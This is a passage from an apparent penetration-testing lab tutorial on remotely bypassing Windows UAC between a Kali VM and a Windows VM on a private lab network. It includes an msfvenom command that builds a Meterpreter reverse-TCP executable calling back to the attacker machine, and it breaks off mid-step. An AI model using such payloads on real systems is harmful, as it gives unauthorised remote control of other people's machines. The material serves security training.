We will remotely bypass Windows UAC to elevate privileges:
- Validate the IP addresses of your Kali VM and your Windows VM – you should have interfaces on both of your host-only networks on both boxes. In my case, my Kali device is 192.168.56.10 and my Windows XP device is 192.168.56.102.
- Open a terminal window by clicking the terminal icon:
- We will quickly create a payload file with msfvenom by typing the following command:
msfvenom -p Windows/meterpreter/reverse_tcp lhost=192.168.56.10 lport=8443 -f exe > /root/exploit.exe
Kali: Terminal output
- Once the payload is created, move it to your target machine.
- Log in to your ...